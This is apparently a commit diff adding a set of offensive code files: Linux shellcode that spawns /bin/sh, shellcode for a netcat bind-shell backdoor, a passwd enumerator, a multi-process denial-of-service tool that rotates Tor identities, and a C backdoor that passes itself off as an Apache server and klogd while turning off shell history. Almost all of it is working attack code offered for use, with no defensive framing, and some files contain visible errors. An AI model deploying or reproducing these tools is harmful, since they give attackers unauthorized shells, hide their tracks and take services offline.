some memory exploitation snippets

Memory_Exploits/Assembly/asm_compiler.sh

@@ -0,0 +1,10 @@
+#!/bin/bash
+if [ $# -ne 1 ]
+then
+ printf "\n\tUsage: $0 filename\n\n"
+ exit
+fi
+filename=`echo $1 | sed s/"\$"//`
+nasm -f elf $filename.asm && ld $filename.o -o $filename
+
+echo "Successfully compiled."

Memory_Exploits/Assembly/get_shell.asm

@@ -0,0 +1,19 @@
+;Universal Shellcode for Unix/Linux 
+section .text ; Text section
+ global _start ; Define _start function
+
+_start: ; _start function
+xor eax, eax ; Zero out eax REGister
+xor ebx, ebx ; Zero out ebx REGister
+xor ecx, ecx ; Zero out ecx REGister
+cdq ; Zero out edx using the sign bit from eax
+push ecx ; Insert 4 byte null in stack
+push 0x68732f6e ; Insert /bin in the stack
+push 0x69622f2f ; Insert //sh in the stack
+mov ebx, esp ; Put /bin//sh in stack
+push ecx ; Put 4 Byte in stack
+push ebx ; Put ebx in stack
+mov ecx, esp ; Insert ebx address in ecx
+xor eax, eax ; Zero out eax register
+mov al, 11 ; Insert __NR_execve 11 syscall
+int 0x80 ; Syscall execute

Memory_Exploits/Assembly/netcat_backdoor.asm

@@ -0,0 +1,29 @@
+;netcat backdoor to inject as a shellcode
+jmp short todo
+shellcode:
+xor eax, eax ; Zero out eax
+xor ebx, ebx ; Zero out ebx
+xor ecx, ecx ; Zero out ecx
+xor edx, edx ; Zero out edx using the sign bit from eax
+mov BYTE al, 0xa4 ; setresuid syscall 164 (0xa4)
+int 0x80 ; syscall execute
+pop esi ; esi contain the string in db
+xor eax, eax ; Zero out eax
+mov[esi + 7], al ; null terminate /bin/nc
+mov[esi + 16], al ; null terminate -lvp90
+mov[esi + 26], al ; null terminate -e/bin/sh
+mov[esi + 27], esi ; store address of /bin/nc in AAAA
+lea ebx, [esi + 8] ; load address of -lvp90 into ebx
+mov[esi +31], ebx ; store address of -lvp90 in BBB taken from ebx
+lea ebx, [esi + 17] ; load address of -e/bin/sh into ebx
+mov[esi + 35], ebx ; store address of -e/bin/sh in CCCC taken from ebx
+mov[esi + 39], eax ; Zero out DDDD
+mov al, 11 ; 11 is execve syscakk number
+mov ebx, esi ; store address of /bin/nc 
+lea ecx, [esi + 27] ; load address of ptr to argv[] array
+lea edx, [esi + 39] ; envp[] NULL
+int 0x80 ; syscall execute 
+todo:
+call shellcode
+db '/bin/nc#-lvp9999#-e/bin/sh#AAAABBBBCCCCDDDD'
+; 0123456789012345678901234567890123456789012

Memory_Exploits/C-codes/crawl_passwd_file.c

@@ -0,0 +1,10 @@
+#include <pwd.h> 
+int main()
+{
+struct passwd *p; 
+while(
+p=getpwent())
+printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name,p->pw_passwd,
+p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
+}
+

Memory_Exploits/C-codes/dos_tool.c

@@ -0,0 +1,107 @@
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <netdb.h>
+#include <signal.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+
+
+int make_socket(char *host, char *port) {
+ struct addrinfo hints, *servinfo, *p;
+ int sock, r;
+// fprintf(stderr, "[Connecting -> %s:%s\n", host, port);
+ memset(&hints, 0, sizeof(hints));
+ hints.ai_family = AF_UNSPEC;
+ hints.ai_socktype = SOCK_STREAM;
+ if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
+ fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
+ exit(0);
+ }
+ for(p = servinfo; p != NULL; p = p->ai_next) {
+ if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
+ continue;
+ }
+ if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
+ close(sock);
+ continue;
+ }
+ break;
+ }
+ if(p == NULL) {
+ if(servinfo)
+ freeaddrinfo(servinfo);
+ fprintf(stderr, "No connection could be made\n");
+ exit(0);
+ }
+ if(servinfo)
+ freeaddrinfo(servinfo);
+ fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
+ return sock;
+}
+
+
+void broke(int s) {
+ // do nothing
+}
+
+
+#define CONNECTIONS 8
+#define THREADS 48
+
+
+void attack(char *host, char *port, int id) {
+ int sockets[CONNECTIONS];
+ int x, g=1, r;
+ for(x=0; x!= CONNECTIONS; x++)
+ sockets[x]=0;
+ signal(SIGPIPE, &broke);
+ while(1) {
+ for(x=0; x != CONNECTIONS; x++) {
+ if(sockets[x] == 0)
+ sockets[x] = make_socket(host, port);
+ r=write(sockets[x], "\0", 1);
+ if(r == -1) {
+ close(sockets[x]);
+ sockets[x] = make_socket(host, port);
+ } else
+// fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r);
+ fprintf(stderr, "[%i: Voly Sent]\n", id);
+ }
+ fprintf(stderr, "[%i: Voly Sent]\n", id);
+ usleep(300000);
+ }
+}
+
+
+void cycle_identity() {
+ int r;
+ int socket = make_socket("localhost", "9050");
+ write(socket, "AUTHENTICATE \"\"\n", 16);
+ while(1) {
+ r=write(socket, "signal NEWNYM\n\x00", 16);
+ fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r);
+ usleep(300000);
+ }
+}
+
+
+int main(int argc, char **argv) {
+ int x;
+ if(argc !=3)
+ cycle_identity();
+ for(x=0; x != THREADS; x++) {
+ if(fork())
+ attack(argv[1], argv[2], x);
+ usleep(200000);
+ }
+ getc(stdin);
+ return 0;
+}
+
+

Memory_Exploits/C-codes/get_stack_pointer.c

@@ -0,0 +1,8 @@
+/* Get stack pointer of the system(Unix/Linux) */
+#iclude <stdio.h>
+unsigned long get_sp(void) {
+ __asm__("movl %esp,%eax");
+}
+void main() {
+ printf("0x%x\n", get_sp());
+}

Memory_Exploits/C-codes/http_backdoor.c

@@ -0,0 +1,129 @@
+#define _XOPEN_SOURCE
+#include <stdio.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/wait.h>
+#include <netinet/in.h>
+#include <signal.h>
+#include <string.h>
+
+#define DEFAULT_PORT 8080
+/* des crypted password */
+#define PWD "QXtGlGiFUEeKY"
+
+void sig_hand(int sig) {
+ int status;
+ /* rip off children */
+ while(waitpid(-1,&status,WNOHANG)>0);
+
+}
+
+/* we hide ourselves as httpd daemon */
+char *erro=
+"HTTP/1.1 404 Not Found\n"
+"Date: Mon, 08 Dec 1998 23:17:15 GMT\n"
+"Server: Apache/1.3.X (Unix)\n"
+"Connection: close\n"
+"Content-Type: text/html\n\n"
+"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"
+"<HTML><HEAD>\n"
+"<TITLE>404 Not Found</TITLE>\n"
+"</HEAD><BODY>\n"
+"<H1>Not Found</H1>\n"
+"The requested URL /loha was not found on this server.<P>\n"
+"<HR>\n"
+"<ADDRESS>Apache/1.3.X Server at yourserver Port 80</ADDRESS>\n"
+"</BODY></HTML>\n";
+
+void my_error(int fd) {
+ write(fd,erro,strlen(erro));
+}
+
+int main(int argc,char **argv)
+{
+ char *name[3];
+ char *env[2];
+ char *execname;
+ int fd,fd2,fromlen;
+ int port;
+ struct sockaddr_in serv;
+ char *crypted=PWD;
+ unsigned char *ptr;
+ char pass[9];
+
+ port=DEFAULT_PORT;
+ if (argc>1 && atoi(argv[1])) port=atoi(argv[1]);
+#ifndef DEBUG
+ if (fork()) exit(1);
+ close(0);
+ close(1);
+ close(2);
+ chdir("/");
+ setsid();
+#endif
+ signal(SIGCHLD,sig_hand);
+
+ if((fd=socket(AF_INET,SOCK_STREAM,0))<0) {
+#ifdef DEBUG
+ perror("socket");
+#endif
+ exit(1);
+ }
+ serv.sin_addr.s_addr=0;
+ serv.sin_port=htons(port);
+ serv.sin_family=AF_INET;
+
+ if(bind(fd,(struct sockaddr *)&serv,16)) {
+#ifdef DEBUG
+ perror("bind");
+#endif
+ exit(1);
+ }
+
+ if(listen(fd,5)) {
+#ifdef DEBUG
+ perror("listen");
+ exit(1);
+#endif
+ }
+
+ for(;;) {
+ fromlen=16; /*(sizeof(struct sockaddr)*/
+ fd2=accept(fd,(struct sockaddr *)&serv,&fromlen);
+ if (fd2<0) continue;
+
+ if (fork()) { /* parent */
+ close(fd2);
+ } else {
+ close(fd);
+ bzero(pass,9);
+ read(fd2,pass,8);
+ for(ptr=pass;*ptr!=0;ptr++)
+ if(*ptr<32) *ptr=0;
+ if (strcmp(crypt(pass,crypted),crypted)) {
+ my_error(fd2);
+ exit(1);
+ }
+ dup2(fd2,0);
+ dup2(fd2,1);
+ dup2(fd2,2);
+ execname="/bin/sh";
+ name[0]="/sbin/klogd";
+ /* gives somewhat nicer appearence */
+ name[1]="-i";
+ name[2]=NULL;
+ /* if the actual /bin/sh is bash
+ * we need this to get rid saving stuff into
+ * .bash_history file
+ */
+ env[0]="HISTFILE=/dev/null";
+ env[1]=NULL;
+ execve(name[0],name,env);
+ exit(1);
+ }
+ }
+}
+
+